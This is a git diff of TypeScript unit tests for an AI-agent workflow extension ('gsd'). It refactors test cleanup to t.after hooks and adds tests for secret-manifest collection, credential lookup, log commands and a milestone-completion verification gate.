-			"ALREADY_SET_KEY should be in existingSkipped");
-	} finally {
+	t.after(() => {
 		delete process.env.ALREADY_SET_KEY;
 		if (savedA !== undefined) process.env.ALREADY_SET_KEY = savedA;
 		rmSync(tmp, { recursive: true, force: true });
-	}
+	});
+
+	process.env.ALREADY_SET_KEY = "present";
+
+	const manifest = makeManifest([
+		{ key: "ALREADY_SET_KEY", status: "pending" },
+		{ key: "NEEDS_COLLECTION", status: "pending" },
+	]);
+	await writeManifestFile(tmp, manifest);
+
+	const collectedKeyNames: string[] = [];
+	let summaryShown = false;
+	const mockCtx = {
+		cwd: tmp,
+		hasUI: true,
+		ui: {
+			custom: async (factory: any) => {
+				// Intercept the factory to check what key is being collected
+				if (!summaryShown) {
+					summaryShown = true;
+					return null; // dismiss summary
+				}
+				collectedKeyNames.push("prompted");
+				return "mock-value";
+			},
+		},
+	};
+
+	const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
+
+	// ALREADY_SET_KEY should not have been prompted — only NEEDS_COLLECTION should
+	assert.ok(!result.applied.includes("ALREADY_SET_KEY"),
+		"ALREADY_SET_KEY should not be in applied (it was auto-skipped)");
+	assert.ok(result.existingSkipped?.includes("ALREADY_SET_KEY"),
+		"ALREADY_SET_KEY should be in existingSkipped");
 });
 
-test("collectSecretsFromManifest: manifest statuses are updated after collection", async () => {
+test("collectSecretsFromManifest: manifest statuses are updated after collection", async (t) => {
 	const { collectSecretsFromManifest } = await loadOrchestrator();
 
 	const tmp = makeTempDir("manifest-update");
-	try {
-		const manifest = makeManifest([
-			{ key: "KEY_TO_COLLECT", status: "pending" },
-			{ key: "KEY_TO_SKIP", status: "pending" },
-		]);
-		const manifestPath = await writeManifestFile(tmp, manifest);
+	t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-		let callIndex = 0;
-		const mockCtx = {
-			cwd: tmp,
-			hasUI: true,
-			ui: {
-				custom: async (_factory: any) => {
-					callIndex++;
-					if (callIndex <= 1) return null; // summary screen dismiss
-					if (callIndex === 2) return "secret-value"; // KEY_TO_COLLECT
-					return null; // KEY_TO_SKIP — user skips
-				},
+	const manifest = makeManifest([
+		{ key: "KEY_TO_COLLECT", status: "pending" },
+		{ key: "KEY_TO_SKIP", status: "pending" },
+	]);
+	const manifestPath = await writeManifestFile(tmp, manifest);
+
+	let callIndex = 0;
+	const mockCtx = {
+		cwd: tmp,
+		hasUI: true,
+		ui: {
+			custom: async (_factory: any) => {
+				callIndex++;
+				if (callIndex <= 1) return null; // summary screen dismiss
+				if (callIndex === 2) return "secret-value"; // KEY_TO_COLLECT
+				return null; // KEY_TO_SKIP — user skips
 			},
-		};
+		},
+	};
 
-		await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
+	await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
 
-		// Read back the manifest file and verify statuses were updated
-		const { parseSecretsManifest } = await loadFilesExports();
-		const updatedContent = readFileSync(manifestPath, "utf8");
-		const updatedManifest = parseSecretsManifest(updatedContent);
+	// Read back the manifest file and verify statuses were updated
+	const { parseSecretsManifest } = await loadFilesExports();
+	const updatedContent = readFileSync(manifestPath, "utf8");
+	const updatedManifest = parseSecretsManifest(updatedContent);
 
-		const keyToCollect = updatedManifest.entries.find(e => e.key === "KEY_TO_COLLECT");
-		const keyToSkip = updatedManifest.entries.find(e => e.key === "KEY_TO_SKIP");
+	const keyToCollect = updatedManifest.entries.find(e => e.key === "KEY_TO_COLLECT");
+	const keyToSkip = updatedManifest.entries.find(e => e.key === "KEY_TO_SKIP");
 
-		assert.equal(keyToCollect?.status, "collected",
-			"KEY_TO_COLLECT should have status 'collected' after providing a value");
-		assert.equal(keyToSkip?.status, "skipped",
-			"KEY_TO_SKIP should have status 'skipped' after user skipped it");
-	} finally {
+	assert.equal(keyToCollect?.status, "collected",
+		"KEY_TO_COLLECT should have status 'collected' after providing a value");
+	assert.equal(keyToSkip?.status, "skipped",
+		"KEY_TO_SKIP should have status 'skipped' after user skipped it");
+});
+
+test("collectSecretsFromManifest: applied keys hydrate process.env for the running session", async (t) => {
+	const { collectSecretsFromManifest } = await loadOrchestrator();
+
+	const tmp = makeTempDir("manifest-live-env");
+	const envKey = "CONTEXT7_API_KEY";
+	const saved = process.env[envKey];
+	t.after(() => {
+		if (saved === undefined) delete process.env[envKey];
+		else process.env[envKey] = saved;
 		rmSync(tmp, { recursive: true, force: true });
-	}
+	});
+
+	delete process.env[envKey];
+
+	const manifest = makeManifest([
+		{ key: envKey, status: "pending" },
+	]);
+	await writeManifestFile(tmp, manifest);
+
+	let callIndex = 0;
+	const mockCtx = {
+		cwd: tmp,
+		hasUI: true,
+		ui: {
+			custom: async (_factory: any) => {
+				callIndex++;
+				if (callIndex <= 1) return null; // summary screen dismiss
+				return "c7_live_test_key";
+			},
+		},
+	};
+
+	const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
+
+	assert.ok(result.applied.includes(envKey), "CONTEXT7_API_KEY should be applied");
+	assert.equal(process.env[envKey], "c7_live_test_key",
+		"applied keys should be available through process.env without restarting");
 });
 
 // ─── showSecretsSummary: render output ────────────────────────────────────────
@@ -423,47 +460,47 @@ test("collectOneSecret: no guidance provided — render output has no guidance s
 
 // ─── collectSecretsFromManifest: returns structured result ────────────────────
 
-test("collectSecretsFromManifest: returns result with applied, skipped, and existingSkipped arrays", async () => {
+test("collectSecretsFromManifest: returns result with applied, skipped, and existingSkipped arrays", async (t) => {
 	const { collectSecretsFromManifest } = await loadOrchestrator();
 
 	const tmp = makeTempDir("manifest-result");
 	const savedKey = process.env.RESULT_TEST_EXISTING;
-	try {
-		process.env.RESULT_TEST_EXISTING = "already-here";
-
-		const manifest = makeManifest([
-			{ key: "RESULT_TEST_EXISTING", status: "pending" },
-			{ key: "RESULT_TEST_NEW", status: "pending" },
-		]);
-		await writeManifestFile(tmp, manifest);
-
-		let callIndex = 0;
-		const mockCtx = {
-			cwd: tmp,
-			hasUI: true,
-			ui: {
-				custom: async (_factory: any) => {
-					callIndex++;
-					if (callIndex <= 1) return null; // summary dismiss
-					return "secret-value"; // collect the pending key
-				},
-			},
-		};
-
-		const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
-
-		// Verify result shape
-		assert.ok(Array.isArray(result.applied), "result should have applied array");
-		assert.ok(Array.isArray(result.skipped), "result should have skipped array");
-		assert.ok(Array.isArray(result.existingSkipped), "result should have existingSkipped array");
-
-		assert.ok(result.existingSkipped.includes("RESULT_TEST_EXISTING"),
-			"existing key should be in existingSkipped");
-		assert.ok(result.applied.includes("RESULT_TEST_NEW"),
-			"collected key should be in applied");
-	} finally {
+	t.after(() => {
 		delete process.env.RESULT_TEST_EXISTING;
 		if (savedKey !== undefined) process.env.RESULT_TEST_EXISTING = savedKey;
 		rmSync(tmp, { recursive: true, force: true });
-	}
+	});
+
+	process.env.RESULT_TEST_EXISTING = "already-here";
+
+	const manifest = makeManifest([
+		{ key: "RESULT_TEST_EXISTING", status: "pending" },
+		{ key: "RESULT_TEST_NEW", status: "pending" },
+	]);
+	await writeManifestFile(tmp, manifest);
+
+	let callIndex = 0;
+	const mockCtx = {
+		cwd: tmp,
+		hasUI: true,
+		ui: {
+			custom: async (_factory: any) => {
+				callIndex++;
+				if (callIndex <= 1) return null; // summary dismiss
+				return "secret-value"; // collect the pending key
+			},
+		},
+	};
+
+	const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
+
+	// Verify result shape
+	assert.ok(Array.isArray(result.applied), "result should have applied array");
+	assert.ok(Array.isArray(result.skipped), "result should have skipped array");
+	assert.ok(Array.isArray(result.existingSkipped), "result should have existingSkipped array");
+
+	assert.ok(result.existingSkipped.includes("RESULT_TEST_EXISTING"),
+		"existing key should be in existingSkipped");
+	assert.ok(result.applied.includes("RESULT_TEST_NEW"),
+		"collected key should be in applied");
 });
diff --git a/src/resources/extensions/gsd/tests/commands-config.test.ts b/src/resources/extensions/gsd/tests/commands-config.test.ts
new file mode 100644
index 000000000..4a0756e32
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/commands-config.test.ts
@@ -0,0 +1,24 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+test("commands-config source-level: tool key lookup skips empty api_key entries", () => {
+  const source = readFileSync(join(__dirname, "..", "commands-config.ts"), "utf-8");
+  assert.ok(
+    source.includes('getCredentialsForProvider(providerId)'),
+    "commands-config should read the full credential list",
+  );
+  assert.ok(
+    source.includes('c.type === "api_key" && c.key'),
+    "commands-config should require a non-empty api_key when resolving stored tool keys",
+  );
+  assert.ok(
+    !source.includes("auth.get(tool.id)"),
+    "commands-config should not rely on auth.get(tool.id), which can return an empty shadowing entry",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/commands-inspect-open-db.test.ts b/src/resources/extensions/gsd/tests/commands-inspect-open-db.test.ts
index e83c07b67..3252a65d9 100644
--- a/src/resources/extensions/gsd/tests/commands-inspect-open-db.test.ts
+++ b/src/resources/extensions/gsd/tests/commands-inspect-open-db.test.ts
@@ -7,40 +7,40 @@ import fs from "node:fs";
 import { handleInspect } from "../commands-inspect.ts";
 import { closeDatabase, openDatabase } from "../gsd-db.ts";
 
-test("/gsd inspect opens existing database when it was not yet opened in session", async () => {
+test("/gsd inspect opens existing database when it was not yet opened in session", async (t) => {
   closeDatabase();
 
   const tmp = fs.mkdtempSync(path.join(os.tmpdir(), "gsd-inspect-db-"));
   const prevCwd = process.cwd();
 
-  try {
-    const gsdDir = path.join(tmp, ".gsd");
-    fs.mkdirSync(gsdDir, { recursive: true });
-    const dbPath = path.join(gsdDir, "gsd.db");
-
-    assert.equal(openDatabase(dbPath), true);
-    closeDatabase();
-
-    process.chdir(tmp);
-
-    const notifications: Array<{ message: string; level: string }> = [];
-    const ctx = {
-      ui: {
-        notify(message: string, level: string) {
-          notifications.push({ message, level });
-        },
-      },
-    } as any;
-
-    await handleInspect(ctx);
-
-    assert.equal(notifications.length, 1);
-    assert.equal(notifications[0].level, "info");
-    assert.match(notifications[0].message, /=== GSD Database Inspect ===/);
-    assert.doesNotMatch(notifications[0].message, /No GSD database available/);
-  } finally {
+  t.after(() => {
     process.chdir(prevCwd);
     closeDatabase();
     fs.rmSync(tmp, { recursive: true, force: true });
-  }
+  });
+
+  const gsdDir = path.join(tmp, ".gsd");
+  fs.mkdirSync(gsdDir, { recursive: true });
+  const dbPath = path.join(gsdDir, "gsd.db");
+
+  assert.equal(openDatabase(dbPath), true);
+  closeDatabase();
+
+  process.chdir(tmp);
+
+  const notifications: Array<{ message: string; level: string }> = [];
+  const ctx = {
+    ui: {
+      notify(message: string, level: string) {
+        notifications.push({ message, level });
+      },
+    },
+  } as any;
+
+  await handleInspect(ctx);
+
+  assert.equal(notifications.length, 1);
+  assert.equal(notifications[0].level, "info");
+  assert.match(notifications[0].message, /=== GSD Database Inspect ===/);
+  assert.doesNotMatch(notifications[0].message, /No GSD database available/);
 });
diff --git a/src/resources/extensions/gsd/tests/commands-logs.test.ts b/src/resources/extensions/gsd/tests/commands-logs.test.ts
index e48744aea..5ebba97ab 100644
--- a/src/resources/extensions/gsd/tests/commands-logs.test.ts
+++ b/src/resources/extensions/gsd/tests/commands-logs.test.ts
@@ -42,22 +42,22 @@ function writeDebugLog(dir: string, name: string, entries: Record<string, unknow
 
 // ─── Tests ──────────────────────────────────────────────────────────────────
 
-test("logs shows empty state message when no logs exist", async () => {
+test("logs shows empty state message when no logs exist", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
   process.chdir(dir);
-  try {
-    await handleLogs("", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    assert.ok(ctx.notifications[0].msg.includes("No logs found"));
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  assert.ok(ctx.notifications[0].msg.includes("No logs found"));
 });
 
-test("logs lists activity logs", async () => {
+test("logs lists activity logs", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
@@ -71,21 +71,21 @@ test("logs lists activity logs", async () => {
     { role: "assistant", content: "Completing slice S01" },
   ]);
 
-  try {
-    await handleLogs("", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    const msg = ctx.notifications[0].msg;
-    assert.ok(msg.includes("Activity Logs"), "should show activity logs header");
-    assert.ok(msg.includes("execute-task"), "should show unit type");
-    assert.ok(msg.includes("complete-slice"), "should show second log");
-    assert.ok(msg.includes("/gsd logs <#>"), "should show usage hint");
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  const msg = ctx.notifications[0].msg;
+  assert.ok(msg.includes("Activity Logs"), "should show activity logs header");
+  assert.ok(msg.includes("execute-task"), "should show unit type");
+  assert.ok(msg.includes("complete-slice"), "should show second log");
+  assert.ok(msg.includes("/gsd logs <#>"), "should show usage hint");
 });
 
-test("logs <N> shows activity log details", async () => {
+test("logs <N> shows activity log details", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
@@ -99,40 +99,40 @@ test("logs <N> shows activity log details", async () => {
     { role: "assistant", content: "I ran the tests and wrote a file" },
   ]);
 
-  try {
-    await handleLogs("1", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    const msg = ctx.notifications[0].msg;
-    assert.ok(msg.includes("Activity Log #1"), "should show log number");
-    assert.ok(msg.includes("execute-task"), "should show unit type");
-    assert.ok(msg.includes("Tool calls: 2"), "should count tool calls");
-    assert.ok(msg.includes("Errors: 1"), "should count errors");
-    assert.ok(msg.includes("/tmp/test.ts"), "should show files written");
-    assert.ok(msg.includes("npm test"), "should show commands run");
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("1", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  const msg = ctx.notifications[0].msg;
+  assert.ok(msg.includes("Activity Log #1"), "should show log number");
+  assert.ok(msg.includes("execute-task"), "should show unit type");
+  assert.ok(msg.includes("Tool calls: 2"), "should count tool calls");
+  assert.ok(msg.includes("Errors: 1"), "should count errors");
+  assert.ok(msg.includes("/tmp/test.ts"), "should show files written");
+  assert.ok(msg.includes("npm test"), "should show commands run");
 });
 
-test("logs <N> shows not found for invalid seq", async () => {
+test("logs <N> shows not found for invalid seq", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
   process.chdir(dir);
 
-  try {
-    await handleLogs("999", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    assert.ok(ctx.notifications[0].msg.includes("not found"));
-    assert.equal(ctx.notifications[0].level, "warning");
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("999", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  assert.ok(ctx.notifications[0].msg.includes("not found"));
+  assert.equal(ctx.notifications[0].level, "warning");
 });
 
-test("logs debug lists debug logs", async () => {
+test("logs debug lists debug logs", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
@@ -143,19 +143,19 @@ test("logs debug lists debug logs", async () => {
     { ts: "2026-03-18T10:35:00Z", event: "debug-summary", dispatches: 5 },
   ]);
 
-  try {
-    await handleLogs("debug", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    const msg = ctx.notifications[0].msg;
-    assert.ok(msg.includes("Debug Logs"), "should show debug logs header");
-    assert.ok(msg.includes("debug-2026-03-18T10-30-00.log"), "should show filename");
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("debug", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  const msg = ctx.notifications[0].msg;
+  assert.ok(msg.includes("Debug Logs"), "should show debug logs header");
+  assert.ok(msg.includes("debug-2026-03-18T10-30-00.log"), "should show filename");
 });
 
-test("logs debug <N> shows debug log summary", async () => {
+test("logs debug <N> shows debug log summary", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
@@ -167,21 +167,21 @@ test("logs debug <N> shows debug log summary", async () => {
     { ts: "2026-03-18T10:35:00Z", event: "debug-summary", dispatches: 5 },
   ]);
 
-  try {
-    await handleLogs("debug 1", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    const msg = ctx.notifications[0].msg;
-    assert.ok(msg.includes("Debug Log:"), "should show debug log header");
-    assert.ok(msg.includes("Events: 3"), "should count events");
-    assert.ok(msg.includes("Dispatches: 5"), "should show dispatch count");
-    assert.ok(msg.includes("dispatch-error"), "should show errors");
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("debug 1", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  const msg = ctx.notifications[0].msg;
+  assert.ok(msg.includes("Debug Log:"), "should show debug log header");
+  assert.ok(msg.includes("Events: 3"), "should count events");
+  assert.ok(msg.includes("Dispatches: 5"), "should show dispatch count");
+  assert.ok(msg.includes("dispatch-error"), "should show errors");
 });
 
-test("logs tail shows recent activity summaries", async () => {
+test("logs tail shows recent activity summaries", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
@@ -195,20 +195,20 @@ test("logs tail shows recent activity summaries", async () => {
     { role: "toolResult", toolCallId: "1", toolName: "bash", isError: true },
   ]);
 
-  try {
-    await handleLogs("tail 2", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    const msg = ctx.notifications[0].msg;
-    assert.ok(msg.includes("Last 2 activity log(s)"), "should show count");
-    assert.ok(msg.includes("#1"), "should show first log");
-    assert.ok(msg.includes("#2"), "should show second log");
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("tail 2", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  const msg = ctx.notifications[0].msg;
+  assert.ok(msg.includes("Last 2 activity log(s)"), "should show count");
+  assert.ok(msg.includes("#1"), "should show first log");
+  assert.ok(msg.includes("#2"), "should show second log");
 });
 
-test("logs clear removes old logs", async () => {
+test("logs clear removes old logs", async (t) => {
   const dir = createTestDir();
   const ctx = createMockCtx();
   const origCwd = process.cwd();
@@ -225,17 +225,17 @@ test("logs clear removes old logs", async () => {
     writeActivityLog(dir, i, "execute-task", `M001/S01/T0${i}`, [{ type: "toolCall" }]);
   }
 
-  try {
-    await handleLogs("clear", ctx as any);
-    assert.equal(ctx.notifications.length, 1);
-    // Old log should be removed, recent ones kept
-    assert.ok(!existsSync(oldFile), "old log should be removed");
-    assert.ok(
-      existsSync(join(dir, ".gsd", "activity", "007-execute-task-M001-S01-T07.jsonl")),
-      "most recent log should be kept",
-    );
-  } finally {
+  t.after(() => {
     process.chdir(origCwd);
     rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  await handleLogs("clear", ctx as any);
+  assert.equal(ctx.notifications.length, 1);
+  // Old log should be removed, recent ones kept
+  assert.ok(!existsSync(oldFile), "old log should be removed");
+  assert.ok(
+    existsSync(join(dir, ".gsd", "activity", "007-execute-task-M001-S01-T07.jsonl")),
+    "most recent log should be kept",
+  );
 });
diff --git a/src/resources/extensions/gsd/tests/commands-workflow-custom.test.ts b/src/resources/extensions/gsd/tests/commands-workflow-custom.test.ts
index 16642a7eb..537bcab4d 100644
--- a/src/resources/extensions/gsd/tests/commands-workflow-custom.test.ts
+++ b/src/resources/extensions/gsd/tests/commands-workflow-custom.test.ts
@@ -100,6 +100,18 @@ steps: []
 // ─── Catalog Registration ────────────────────────────────────────────────
 
 describe("workflow catalog registration", () => {
+  it("model appears in TOP_LEVEL_SUBCOMMANDS", () => {
+    const entry = TOP_LEVEL_SUBCOMMANDS.find((c) => c.cmd === "model");
+    assert.ok(entry, "model should be in TOP_LEVEL_SUBCOMMANDS");
+    assert.match(entry!.desc, /session model/i);
+  });
+
+  it("getGsdArgumentCompletions('m') includes model", () => {
+    const completions = getGsdArgumentCompletions("m");
+    const labels = completions.map((c: any) => c.label);
+    assert.ok(labels.includes("model"), "should include model completion");
+  });
+
   it("workflow appears in TOP_LEVEL_SUBCOMMANDS", () => {
     const entry = TOP_LEVEL_SUBCOMMANDS.find((c) => c.cmd === "workflow");
     assert.ok(entry, "workflow should be in TOP_LEVEL_SUBCOMMANDS");
diff --git a/src/resources/extensions/gsd/tests/complete-milestone.test.ts b/src/resources/extensions/gsd/tests/complete-milestone.test.ts
index 31c77e054..b32fd2a51 100644
--- a/src/resources/extensions/gsd/tests/complete-milestone.test.ts
+++ b/src/resources/extensions/gsd/tests/complete-milestone.test.ts
@@ -1,9 +1,11 @@
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
 import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
 import { join, dirname } from "node:path";
 import { tmpdir } from "node:os";
 import { fileURLToPath } from "node:url";
-import { createTestContext } from './test-helpers.ts';
 import { invalidateAllCaches } from '../cache.ts';
+import { parseUnitId } from "../unit-id.ts";
 
 // loadPrompt reads from ~/.gsd/agent/extensions/gsd/prompts/ (main checkout).
 // In a worktree the file may not exist there yet, so we resolve prompts
@@ -11,7 +13,6 @@ import { invalidateAllCaches } from '../cache.ts';
 const __dirname = dirname(fileURLToPath(import.meta.url));
 const worktreePromptsDir = join(__dirname, "..", "prompts");
 
-const { assertEq, assertTrue, report } = createTestContext();
 /**
  * Load a prompt template from the worktree prompts directory
  * and apply variable substitution (mirrors loadPrompt logic).
@@ -59,11 +60,9 @@ function cleanup(base: string): void {
 // Tests
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
+describe("complete-milestone", () => {
 
-  // ─── Prompt Template Loading ───────────────────────────────────────────
-  console.log("\n=== complete-milestone prompt template exists ===");
-  {
+  test("prompt template exists and loads", () => {
     let result: string;
     let threw = false;
     try {
@@ -77,16 +76,13 @@ async function main(): Promise<void> {
     } catch (err) {
       threw = true;
       result = "";
-      console.error(`  ERROR: loadPrompt threw: ${err}`);
     }
 
-    assertTrue(!threw, "loadPrompt does not throw for complete-milestone");
-    assertTrue(typeof result === "string" && result.length > 0, "loadPrompt returns a non-empty string");
-  }
+    assert.ok(!threw, "loadPrompt does not throw for complete-milestone");
+    assert.ok(typeof result === "string" && result.length > 0, "loadPrompt returns a non-empty string");
+  });
 
-  // ─── Variable Substitution ─────────────────────────────────────────────
-  console.log("\n=== prompt variable substitution ===");
-  {
+  test("prompt variable substitution", () => {
     const prompt = loadPromptFromWorktree("complete-milestone", {
       workingDirectory: "/tmp/test-project",
       milestoneId: "M001",
@@ -95,19 +91,17 @@ async function main(): Promise<void> {
       inlinedContext: "--- inlined slice summaries and context ---",
     });
 
-    assertTrue(prompt.includes("M001"), "prompt contains milestoneId 'M001'");
-    assertTrue(prompt.includes("Integration Feature"), "prompt contains milestoneTitle");
-    assertTrue(prompt.includes(".gsd/milestones/M001/M001-ROADMAP.md"), "prompt contains roadmapPath");
-    assertTrue(prompt.includes("--- inlined slice summaries and context ---"), "prompt contains inlinedContext");
-    assertTrue(!prompt.includes("{{milestoneId}}"), "no un-substituted {{milestoneId}}");
-    assertTrue(!prompt.includes("{{milestoneTitle}}"), "no un-substituted {{milestoneTitle}}");
-    assertTrue(!prompt.includes("{{roadmapPath}}"), "no un-substituted {{roadmapPath}}");
-    assertTrue(!prompt.includes("{{inlinedContext}}"), "no un-substituted {{inlinedContext}}");
-  }
+    assert.ok(prompt.includes("M001"), "prompt contains milestoneId 'M001'");
+    assert.ok(prompt.includes("Integration Feature"), "prompt contains milestoneTitle");
+    assert.ok(prompt.includes(".gsd/milestones/M001/M001-ROADMAP.md"), "prompt contains roadmapPath");
+    assert.ok(prompt.includes("--- inlined slice summaries and context ---"), "prompt contains inlinedContext");
+    assert.ok(!prompt.includes("{{milestoneId}}"), "no un-substituted {{milestoneId}}");
+    assert.ok(!prompt.includes("{{milestoneTitle}}"), "no un-substituted {{milestoneTitle}}");
+    assert.ok(!prompt.includes("{{roadmapPath}}"), "no un-substituted {{roadmapPath}}");
+    assert.ok(!prompt.includes("{{inlinedContext}}"), "no un-substituted {{inlinedContext}}");
+  });
 
-  // ─── Prompt Content Integrity ──────────────────────────────────────────
-  console.log("\n=== prompt content integrity ===");
-  {
+  test("prompt content integrity", () => {
     const prompt = loadPromptFromWorktree("complete-milestone", {
       workingDirectory: "/tmp/test-project",
       milestoneId: "M002",
@@ -116,18 +110,109 @@ async function main(): Promise<void> {
       inlinedContext: "context",
     });
 
-    assertTrue(prompt.includes("Complete Milestone"), "prompt contains 'Complete Milestone' heading");
-    assertTrue(prompt.includes("success criter") || prompt.includes("success criteria"), "prompt mentions success criteria verification");
-    assertTrue(prompt.includes("milestone-summary") || prompt.includes("milestoneSummary"), "prompt references milestone summary artifact");
-    assertTrue(prompt.includes("Milestone M002 complete"), "prompt contains completion sentinel for M002");
-  }
+    assert.ok(prompt.includes("Complete Milestone"), "prompt contains 'Complete Milestone' heading");
+    assert.ok(prompt.includes("success criter") || prompt.includes("success criteria"), "prompt mentions success criteria verification");
+    assert.ok(prompt.includes("milestone-summary") || prompt.includes("milestoneSummary"), "prompt references milestone summary artifact");
+    assert.ok(prompt.includes("Milestone M002 complete"), "prompt contains completion sentinel for M002");
+  });
 
-  // ─── diagnoseExpectedArtifact behavior ─────────────────────────────────
-  // Since diagnoseExpectedArtifact is not exported from auto.ts, we test
-  // the same logic by reimplementing the switch case for complete-milestone
-  // and verifying against known path patterns.
-  console.log("\n=== diagnoseExpectedArtifact logic for complete-milestone ===");
-  {
+  test("prompt contains verification gate that blocks completion on failure", () => {
+    const prompt = loadPromptFromWorktree("complete-milestone", {
+      workingDirectory: "/tmp/test-project",
+      milestoneId: "M001",
+      milestoneTitle: "Gate Test",
+      roadmapPath: ".gsd/milestones/M001/M001-ROADMAP.md",
+      inlinedContext: "context",
+    });
+
+    // Verification gate section must exist
+    assert.ok(
+      prompt.includes("Verification Gate"),
+      "prompt contains 'Verification Gate' section",
+    );
+
+    // Failure path must block gsd_complete_milestone
+    assert.ok(
+      prompt.includes("Do NOT call `gsd_complete_milestone`"),
+      "failure path explicitly blocks calling the completion tool",
+    );
+
+    // Failure path must have its own sentinel distinct from success
+    assert.ok(
+      prompt.includes("verification FAILED"),
+      "failure path outputs a FAILED sentinel",
+    );
+
+    // verificationPassed parameter must be referenced
+    assert.ok(
+      prompt.includes("verificationPassed"),
+      "prompt references verificationPassed parameter",
+    );
+  });
+
+  test("handleCompleteMilestone rejects when verificationPassed is false", async () => {
+    const { handleCompleteMilestone } = await import("../tools/complete-milestone.ts");
+    const base = createFixtureBase();
+    try {
+      const result = await handleCompleteMilestone({
+        milestoneId: "M001",
+        title: "Test Milestone",
+        oneLiner: "Test",
+        narrative: "Test narrative",
+        successCriteriaResults: "None met",
+        definitionOfDoneResults: "Incomplete",
+        requirementOutcomes: "None validated",
+        keyDecisions: [],
+        keyFiles: [],
+        lessonsLearned: [],
+        followUps: "",
+        deviations: "",
+        verificationPassed: false,
+      }, base);
+
+      assert.ok("error" in result, "returns error when verificationPassed is false");
+      assert.ok(
+        (result as { error: string }).error.includes("verification did not pass"),
+        "error message mentions verification did not pass",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("handleCompleteMilestone rejects when verificationPassed is omitted", async () => {
+    const { handleCompleteMilestone } = await import("../tools/complete-milestone.ts");
+    const base = createFixtureBase();
+    try {
+      // Simulate omitted verificationPassed (undefined coerced via any)
+      const params: any = {
+        milestoneId: "M001",
+        title: "Test Milestone",
+        oneLiner: "Test",
+        narrative: "Test narrative",
+        successCriteriaResults: "Results",
+        definitionOfDoneResults: "Done results",
+        requirementOutcomes: "Outcomes",
+        keyDecisions: [],
+        keyFiles: [],
+        lessonsLearned: [],
+        followUps: "",
+        deviations: "",
+        // verificationPassed intentionally omitted
+      };
+      const result = await handleCompleteMilestone(params, base);
+
+      assert.ok("error" in result, "returns error when verificationPassed is omitted");
+      assert.ok(
+        (result as { error: string }).error.includes("verification did not pass"),
+        "error message mentions verification did not pass",
+      );
+    } finally {
+      cleanup(base);
+    }
+  });
+
+  test("diagnoseExpectedArtifact logic for complete-milestone", async () => {
     // Import the path helpers used by diagnoseExpectedArtifact
     const { relMilestoneFile } = await import("../paths.ts");
 
@@ -138,27 +223,191 @@ async function main(): Promise<void> {
 
       const unitType = "complete-milestone";
       const unitId = "M001";
-      const parts = unitId.split("/");
-      const mid = parts[0]!;
+      const { milestone: mid } = parseUnitId(unitId);
 
       // This is the exact logic from diagnoseExpectedArtifact for "complete-milestone"
       const result = `${relMilestoneFile(base, mid, "SUMMARY")} (milestone summary)`;
 
-      assertTrue(typeof result === "string", "diagnose returns a string");
-      assertTrue(result.includes("SUMMARY"), "diagnose result mentions SUMMARY");
-      assertTrue(result.includes("milestone"), "diagnose result mentions milestone");
-      assertTrue(result.includes("M001"), "diagnose result includes the milestone ID");
+      assert.ok(typeof result === "string", "diagnose returns a string");
+      assert.ok(result.includes("SUMMARY"), "diagnose result mentions SUMMARY");
+      assert.ok(result.includes("milestone"), "diagnose result mentions milestone");
+      assert.ok(result.includes("M001"), "diagnose result includes the milestone ID");
